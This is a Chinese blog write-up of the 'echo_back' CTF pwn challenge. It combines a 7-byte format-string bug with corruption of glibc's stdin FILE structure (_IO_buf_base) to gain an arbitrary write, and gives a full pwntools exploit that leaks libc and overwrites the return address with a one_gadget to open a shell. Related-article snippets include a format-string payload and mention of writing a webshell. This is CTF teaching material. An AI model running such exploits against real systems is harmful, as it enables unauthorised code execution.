CTF-Pwn echo_back(文件IO指针利用+格式化字符串漏洞)

最新推荐文章于 2024-09-26 10:00:23 发布
原创 最新推荐文章于 2024-09-26 10:00:23 发布 · 1.2k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

程序综述

supergate@ubuntu:~/Desktop/Pwn$ checksec echo_back
[*] '/home/supergate/Desktop/Pwn/echo_back'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

保护全开,但是题目中给了libc库(为2.23版本),因此可以考虑使用onegadget来getshell。

supergate@ubuntu:~/Desktop/Pwn$ ./echo_back
#  ____ _   _ ___  ____ ____ ___  ____ ____ ____ ____ 
#  |     \_/  |__] |___ |__/ |__] |___ |__| |    |___ 
#  |___   |   |__] |___ |  \ |    |___ |  | |___ |___ 
#                                                     
#  Welcome to CyberPeace echo-back service!
#                                                     
-----------menu-----------
1. set name
2. echo back
3. exit
choice>>

运行程序后发现有菜单选项,因此分别查看set nameecho back的函数功能

set name

ssize_t __fastcall readName(void *a1)
{
  printf("name:");
  return read(0, a1, 7uLL);
}

echo back

unsigned __int64 __fastcall inputContent(_BYTE *a1)
{
  size_t nbytes; // [rsp+1Ch] [rbp-14h]
  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  memset((char *)&nbytes + 4, 0, 8uLL);
  printf("length:", 0LL);
  _isoc99_scanf("%d", &nbytes);
  getchar();
  if ( (nbytes & 0x80000000) != 0LL || (signed int)nbytes > 6 )
    LODWORD(nbytes) = 7;
  read(0, (char *)&nbytes + 4, (unsigned int)nbytes);
  if ( *a1 )
    printf("%s say:", a1);
  else
    printf("anonymous say:", (char *)&nbytes + 4);
  printf((const char *)&nbytes + 4);
  return __readfsqword(0x28u) ^ v3;
}

容易发现echo back中有一个格式化字符串漏洞

漏洞利用

如上所述,我们找到了一个格式化字符串漏洞的地方。但是可惜的是,我们只能输入7个字节的格式化字符串,这导致我们无法对栈内的值进行大规模的修改。但是修改某个地址的后几个字节为\x00还是比较容易的。
另外,echo back函数中也使用了scanf函数,而scanf函数又和IO_2_1_stdin有着较大的关系。我们可以考虑用文件IO指针来对程序进行攻击。

阅读scanf源码,知道scanf函数调用了_IO_vfscanf,并且提供了文件指针stdin。

使用pwndbg调试的时候可以看一下这个结构体

pwndbg> p _IO_2_1_stdin_
$1 = {
  file = {
    _flags = -72540021, 
    _IO_read_ptr = 0x7ffff7dd1963 <_IO_2_1_stdin_+131> "\n", 
    _IO_read_end = 0x7ffff7dd1963 <_IO_2_1_stdin_+132> "", 
    _IO_read_base = 0x7ffff7dd1963 <_IO_2_1_stdin_+131> "\n", 
    _IO_write_base = 0x7ffff7dd1963 <_IO_2_1_stdin_+131> "\n", 
    _IO_write_ptr = 0x7ffff7dd1963 <_IO_2_1_stdin_+131> "\n", 
    _IO_write_end = 0x7ffff7dd1963 <_IO_2_1_stdin_+131> "\n", 
    _IO_buf_base = 0x7ffff7dd1963 <_IO_2_1_stdin_+131> "\n", 
    _IO_buf_end = 0x7ffff7dd1964 <_IO_2_1_stdin_+132> "", 
    _IO_save_base = 0x0, 
    _IO_backup_base = 0x0, 
    _IO_save_end = 0x0, 
    _markers = 0x0, 
    _chain = 0x0, 
    _fileno = 0, 
    _flags2 = 0, 
    _old_offset = -1, 
    _cur_column = 0, 
    _vtable_offset = 0 '\000', 
    _shortbuf = "\n", 
    _lock = 0x7ffff7dd3790 <_IO_stdfile_0_lock>, 
    _offset = -1, 
    _codecvt = 0x0, 
    _wide_data = 0x7ffff7dd19c0 <_IO_wide_data_0>, 
    _freeres_list = 0x0, 
    _freeres_buf = 0x0, 
    __pad5 = 0, 
    _mode = -1, 
    _unused2 = '\000' <repeats 19 times>
  }, 
  vtable = 0x7ffff7dd06e0 <_IO_file_jumps>
}

再向底层进行分析之后,发现最终会调用到_IO_new_file_underflow进行输入,我们跟进查看逻辑:

int
_IO_new_file_underflow (_IO_FILE *fp)
{
  _IO_ssize_t count;
#if 0
  /* SysV does not make this test; take it out for compatibility */
  if (fp->_flags & _IO_EOF_SEEN)
    return (EOF);
#endif

  if (fp->_flags & _IO_NO_READS)
    {
      fp->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return EOF;
    }
  if (fp->_IO_read_ptr < fp->_IO_read_end)
    return *(unsigned char *) fp->_IO_read_ptr;

  if (fp->_IO_buf_base == NULL)
    {
      /* Maybe we already have a push back pointer.  */
      if (fp->_IO_save_base != NULL)
	{
	  free (fp->_IO_save_base);
	  fp->_flags &= ~_IO_IN_BACKUP;
	}
      _IO_doallocbuf (fp);
    }
  if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
    {
#if 0
      _IO_flush_all_linebuffered ();
#else
      _IO_acquire_lock (_IO_stdout);

      if ((_IO_stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
	  == (_IO_LINKED | _IO_LINE_BUF))
	_IO_OVERFLOW (_IO_stdout, EOF);

      _IO_release_lock (_IO_stdout);
#endif
    }

  _IO_switch_to_get_mode (fp);
  fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
  fp->_IO_read_end = fp->_IO_buf_base;
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
    = fp->_IO_buf_base;

  count = _IO_SYSREAD (fp, fp->_IO_buf_base,
		       fp->_IO_buf_end - fp->_IO_buf_base);
  if (count <= 0)
    {
      if (count == 0)
	fp->_flags |= _IO_EOF_SEEN;
      else
	fp->_flags |= _IO_ERR_SEEN, count = 0;
  }
  fp->_IO_read_end += count;
  if (count == 0)
    {
      fp->_offset = _IO_pos_BAD;
      return EOF;
    }
  if (fp->_offset != _IO_pos_BAD)
    _IO_pos_adjust (fp->_offset, count);
  return *(unsigned char *) fp->_IO_read_ptr;
}
libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)

当_IO_read_ptr < _IO_read_end时,函数直接返回_IO_read_ptr。反之,则会进行一系列赋值操作,最终调用read的系统调用向_IO_buf_base中读入数据。可以想到,当可以控制_IO_buf_base的值就可以达到任意地址写的目的了。

题目中可以利用是因为在调用scanf之前的时候,_IO_read_ptr ==_IO_read_end。并且将_IO_buf_base的低位赋值为\x00时,指针恰好指向了stdin内部地址,并且可以再次覆写_IO_buf_base进一步造成内存任意写

pwndbg> x/30gx 0x7ffff7dd1963-0x83
0x7ffff7dd18e0 <_IO_2_1_stdin_>:	0x00000000fbad208b	0x00007ffff7dd1963
0x7ffff7dd18f0 <_IO_2_1_stdin_+16>:	0x00007ffff7dd1964	0x00007ffff7dd1963
0x7ffff7dd1900 <_IO_2_1_stdin_+32>:	0x00007ffff7dd1963	0x00007ffff7dd1963
0x7ffff7dd1910 <_IO_2_1_stdin_+48>:	0x00007ffff7dd1963	0x00007ffff7dd1963
0x7ffff7dd1920 <_IO_2_1_stdin_+64>:	0x00007ffff7dd1964	0x0000000000000000
0x7ffff7dd1930 <_IO_2_1_stdin_+80>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd1940 <_IO_2_1_stdin_+96>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd1950 <_IO_2_1_stdin_+112>:	0x0000000000000000	0xffffffffffffffff
0x7ffff7dd1960 <_IO_2_1_stdin_+128>:	0x000000000a000000	0x00007ffff7dd3790
0x7ffff7dd1970 <_IO_2_1_stdin_+144>:	0xffffffffffffffff	0x0000000000000000
0x7ffff7dd1980 <_IO_2_1_stdin_+160>:	0x00007ffff7dd19c0	0x0000000000000000
0x7ffff7dd1990 <_IO_2_1_stdin_+176>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd19a0 <_IO_2_1_stdin_+192>:	0x00000000ffffffff	0x0000000000000000
0x7ffff7dd19b0 <_IO_2_1_stdin_+208>:	0x0000000000000000	0x00007ffff7dd06e0
0x7ffff7dd19c0 <_IO_wide_data_0>:	0x0000000000000000	0x0000000000000000

而在scanf后面跟了一个getchar()函数,每次调用这个函数是会导致_IO_read_ptr++。这样我们就可以通过scanf输入0个字节,来让_IO_read_ptr ==_IO_read_end,从而向_IO_buf_base指向的地址写入数据。

显然,我们可以将_IO_buf_base设置为函数的返回地址,然后把这个地址写为onegadget的地址即可。

exp

from pwn import *
context.log_level='debug'

p=process('./echo_back')
elf=ELF('./echo_back')
libc=ELF('./libc.so.6')
#gdb.attach(p)

def inputContent(length,content):
    p.sendlineafter(">> ","2")
    p.sendafter("length:",str(length))
    p.sendline(content)

def readName(content):
    p.sendlineafter(">> ","1")
    p.sendlineafter("name:",content)

inputContent("7\n","%2$p")
p.recvuntil("anonymous say:")
libc.address=int(p.recvuntil("----",drop=True),16)-0x3c6780
gadget_addr=libc.address+0x45216
IO_buf_base_addr=libc.symbols['_IO_2_1_stdin_']+0x38
print "IO_buf_base_addr ======> "+hex(IO_buf_base_addr)

inputContent("7\n","%7$p")
p.recvuntil("anonymous say:")
ret_stack_addr=int(p.recvuntil("----",drop=True),16)-0x18
print "ret_stack_addr ======> "+hex(ret_stack_addr)

padding_addr=IO_buf_base_addr-0x18+0x63
readName(p64(IO_buf_base_addr))
inputContent("7\n","%16$hhn")

payload=p64(padding_addr)*3+p64(ret_stack_addr)+p64(ret_stack_addr+8)
#保证在_IO_buf_base处只写入8个字节的内容
inputContent(payload,'')

for i in range(0x28-1):
    p.sendlineafter(">> ","2")
    p.sendlineafter("length:",'')

p.sendlineafter(">> ","2")
p.sendlineafter("length:",p64(gadget_addr))
p.sendline()
p.interactive()
攻防世界(pwn)echo_back + magic (_IO_FILE文件流攻击初探)
PLpa的博客
03-14 1496
前言: 这两题都是关于_IO_FILE文件流攻击的题目,如果对_IO_FILE文件流不是很清楚,可以看ctfwiki中的_IO_FILE介绍——传送门。 echo_back——关于_IO_2_1_stdin结构的利用 文件保护全开,不能got覆写。 进入IDA,发现程序有两个功能,一个是setname,一个是echo back。 查看setname功能,发现此功能只能输入7个字节,不具备RO...
echo_back(xctf)
weixin_43868725的博客
08-16 807
0x0 程序保护和流程 保护: 流程: main() echo_back() 存在一个格式化字符串漏洞。 0x1 利用过程 1.题目保护全开,程序中又没有可用的字符串,函数。所以只能通过格式化字符串漏洞泄露地址,写入有限数据。 2.既然有格式化字符串漏洞,肯定是要泄露栈上的信息。但是由于限制了字符串最长为7,所以只能逐位泄露。 选择使用ida的远程调试,因为可以丢弃alarm()发出的signal。选择在echo_back()的retn处下断点 直到到输入%6$p时在栈上发现了被输出的数据(为什么是
【攻防世界】echo_back
weixin_43960998的博客
04-05 545
1.程序逆向 程序读起来很简单,提供了两个功能,设置姓名和可以一直循环进行 echo_back,在 echo_back 中存在一个格式化字符串漏洞,但是每次最多读取 7 字节: 首先想到是写返回地址,但是最多只写 7 字节导致不能输送完整的 rop ,所以这里需要学习一个新的知识点。 2.漏洞利用&知识点 一个可以循环利用格式化字符串,但是有字符限制 程序通过 scanf 输入 先是通过栈上的一些数据来泄漏 libc_base,elf_base,还要泄漏存放 main 的返回地址的栈地址,这
PWN技巧之攻防世界echo_back
aptx4869_li的博客
02-20 785
PWN技巧之攻防世界echo_back
攻防世界PWNecho_back题解
seaaseesa的博客
11-17 2927
echo_back 首先,检查一下程序的保护机制,发现保护全开 然后,我们用IDA分析一下, 在功能2有一个明显的格式化输出字符串漏洞 但是,我们能够输入的字符串长度最多为7个字符 好啦,不管怎么说,首先得用这个漏洞泄露一些地址 当我们要执行printf时,我们发现,距离当前栈顶13个位置处,有__libc_start_main+F0的地址,但是,这不是说要输出它的值...
[CTF]PWN--手搓格式化字符串漏洞
2301_79880752的博客
02-19 1712
而是,原来我们修改了的其实是0x7f1与0x7f2里的东西,那后面我们就需要修改0x7f3与0x7f4里的东西,因此我们+2的意思就是将原来的0x7f1+2,修改成0x7f3,这样,我们在修改的时候改的就是0x7f3与0x7f4里的东西了(思路是这样的,一个栈地址一共八个字节,我们需要将要修改的地址和被修改的地址每两个字节对应的修改,直到最后将所以字节都修改成我们需要的地址。修改最高二位的时候也是一样的,由于栈里面的地址与libc里面的地址一般都只占6个字节,因此,我们只需要进行三次修改即可。
BUUCTF-PWN刷题记录-18(格式化字符串漏洞
weixin_44145820的博客
05-08 2077
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
CTF-ECHO-200格式化字符串漏洞+shellcode
BadRer的博客
06-01 2397
很开心有成功做了一道格式化字符串,这题我也不清楚是哪次比赛上的,漏洞还是十分的明显,格式化加个shellcode直接搞定。就是这算的比较麻烦一点。 那么直接进入正题咯! 开干!! 首先拿checksec检查一遍(个人习惯哈) 可以看到,开了栈保护,但是NX disabled,说明堆栈可执行,直接上shellcode,也没有PIE。 先试试水。 应该有格式化漏洞。 IDA反汇
非栈上格式化字符串漏洞利用例题
最新发布
09-30
非栈上格式化字符串漏洞利用例题
2020-11-09学习记录:攻防世界pwnecho_back
eeeeeight的博客
11-09 357
今天就算是世界毁灭,我也要更新博客,容我先睡一觉
[XCTF-pwn] 24_ciscn-2018-Quals-echo_back
weixin_52640415的博客
03-08 372
格式化字符串漏洞,输入长度受限,劫持_IO_2_1_stdin_读入payload unsigned __int64 __fastcall echo_back(const char *a1) { size_t nbytes; // [rsp+1Ch] [rbp-14h] BYREF unsigned __int64 v3; // [rsp+28h] [rbp-8h] v3 = __readfsqword(0x28u); memset((char *)&nbytes + 4, 0
2019XCTF攻防世界之萌新入坑(echo
weixin_44113469的博客
04-25 670
ret2resolve exp import sys import roputils from pwn import * context.log_level = 'debug' #r = process("./pwn") p = remote("111.198.29.45",37888) rop = roputils.ROP('./echo') addr_bss = rop.sect...
2017_NJCTF_reverse_echo_server
ACdream
03-18 742
2017 NJCTF reverse
通信词典
热门推荐
放牛娃的专栏
07-28 3万+
通信类常用的英语词汇 (表记录的)插入修改添加删除 InsertModify, updateAddDelete (拨号后)拨号音不断 Non-stop Dial Tone (程序,进程)调度 Dispatch (程序安装的)序列号 Serial Number SN (单板)不在位 Not-in-position (单板等)插入/拔出 Plug/Unplug (发货)附件,辅助设备 Acce
CTF—命令执行总结
qq_45927819的博客
11-13 4838
文章目录前言空格绕过命令分割符关键词过滤编码绕过 前言 最近遇到了好多命令执行的web题,这就来总结一下这方面的知识!! 空格绕过 常见的绕过符号有: $IFS$9 、${IFS} 、%09(php环境下)、 重定向符<>、> $IFS在linux下表示分隔符,如果不加{}则bash会将IFS解释为一个变量名, 加一个{}就固定了变量名,$IFS$9后面之所以加个$是为了起到截断的作用 ;为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 不仅 $
推荐几款开源的CTF平台,零基础入门到精通,收藏这一篇就够了
leah126的博客
09-26 1746
CTFd支持动态评分挑战,解锁提示,个人和团体比赛,具有自动平局分辨记分牌,比较前 10 名球队和球队进度图的记分图,团队管理、隐藏和封禁等等。相对来说是一个比较全面的CTF平台。
pwn做题笔记14-echo_back(printf函数栈详细利用+利用控制scanfIO流实现任意地址写入)
qq_40923256的博客
08-28 711
当Linux新建一个进程时,会自动创建3个文件描述符0、1和2,分别对应标准输入、标准输出和错误输出。C库中创建与文件描述符对应的是文件指针scanf读取stdin时依照读文件的方法,内部调用_IO_new_file_underflow函数。而该函数最终调用了_IO_SYSREAD系统调用来读取文件。在调用系统函数前,该函数同时进行了判断处理:根据读取指针的位置和结束位置来判断缓冲区中是否还有可读取的数据。
ctf】命令执行漏洞()
wlllllianqing的博客
10-15 839
命令执行漏洞() 15位、7位、5位、4位可控字符下的任意命令执行 15位可控字符 利用原理: 直接下载一个空文件,然后直接将shell分段写入文件中,最后修改文件名来getshell wget是Linux中的一个下载文件的工具 echo可以直接将字符输出到文件中,但需要使用‘>’符号 且第一次输出到文件中时使用‘>’符号,再输入进文件就需要使用‘>>’来进行追加 例如:将一句话写入文件 <?php eval($_GET[1]); 注意:当遇到符号时,记得使用
xctf攻防世界_echo——爬坑之路(ret2dlresolve)
勤劳的小蜜蜂
05-27 1050
很容易看到是栈溢出漏洞,而且给出了一个sample()的函数来读取flag,直接覆盖返回地址,在本地调试很快就弄完了。但是没想到,跟服务器连接后,死活出不来。没办法,想到上一篇文章一样的坑,看来只能拿Shell才行了。 查找了很多资料,一开始想着用write()函数泄漏,结果没这个函数。还动过使用fprintf函数的想法,但是远程太坑了。留几个学习到的点: 1、 gbd中可以使...
[CTF]PWN--非栈上格式化字符串漏洞
08-14
### 非栈上格式化字符串漏洞概述 在CTF比赛的PWN类别中,格式化字符串漏洞是一种常见的安全漏洞,通常出现在使用不安全的格式化函数(如`printf`、`sprintf`等)时。如果程序允许用户直接控制格式化字符串参数,而未进行适当的验证和过滤,则可能导致攻击者利用漏洞读取或写入内存数据。 在栈上的格式化字符串漏洞利用较为常见,而非栈上格式化字符串漏洞则涉及对堆内存或其他非栈内存区域的利用。这类漏洞通常更具挑战性,但也提供了更多的攻击面。 ### 利用方法 非栈上格式化字符串漏洞利用主要依赖于对格式化字符串中特殊格式符的使用,尤其是`%n`。`%n`的作用是将当前已经输出的字符数写入指定的指针位置。通过精心构造格式化字符串,攻击者可以实现任意地址写入(Arbitrary Write)。 在非栈上场景中,通常需要找到一个可以控制的指针,指向堆内存或其他可写区域。例如,攻击者可以通过泄露堆地址,然后利用`%n`将数据写入堆中的特定位置。这种方法常用于覆盖函数指针或全局偏移表(GOT)中的条目,从而实现控制流劫持。 ```c // 示例代码,展示不安全的格式化字符串使用 #include <stdio.h> void vulnerable_function(char *user_input) { printf(user_input); // 不安全的格式化字符串使用 } int main(int argc, char **argv) { if (argc > 1) { vulnerable_function(argv[1]); } return 0; } ``` 在上述示例中,如果攻击者能够控制`user_input`的内容,则可以构造特定的格式化字符串来触发漏洞。例如,攻击者可以输入类似`%x%x%x%n`的字符串,试图读取栈上的数据并写入特定地址。 ### 防御方法 为了防止非栈上格式化字符串漏洞利用,可以采取以下几种防御措施: 1. **避免使用不安全的格式化函数**:尽量使用带有显式参数的格式化函数,如`fprintf`、`snprintf`等,并确保格式字符串是静态常量,而不是用户可控的输入。 2. **输入验证和过滤**:对用户输入进行严格的验证和过滤,确保输入中不包含任何格式化字符(如`%`)。可以通过白名单机制来限制输入内容。 3. **地址空间布局随机化(ASLR)**:启用ASLR可以增加攻击者预测内存地址的难度,从而降低漏洞利用的成功率。 4. **堆内存保护**:使用现代编译器提供的堆内存保护机制,如堆栈保护(Stack Canaries)、地址随机化等,以增加攻击者利用漏洞的难度。 5. **代码审计和静态分析**:定期进行代码审计和静态分析,查找并修复潜在的安全漏洞。使用静态分析工具可以帮助识别不安全的格式化字符串使用。 6. **运行时检测**:在程序运行时检测格式化字符串的使用情况,及时发现并阻止异常行为。 ### 示例:修复不安全的格式化字符串使用 ```c // 修复后的代码,使用安全的格式化字符串使用方式 #include <stdio.h> void safe_function(char *user_input) { printf("%s", user_input); // 使用安全的方式处理用户输入 } int main(int argc, char **argv) { if (argc > 1) { safe_function(argv[1]); } return 0; } ``` 在修复后的代码中,通过使用`%s`格式化符并显式传递用户输入,避免了用户输入直接作为格式化字符串的风险。 ### 总结 非栈上格式化字符串漏洞利用虽然较为复杂,但通过精心构造的格式化字符串和内存操作,攻击者仍然可以实现严重的攻击效果。因此,在开发过程中,必须采取有效的防御措施,确保程序的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值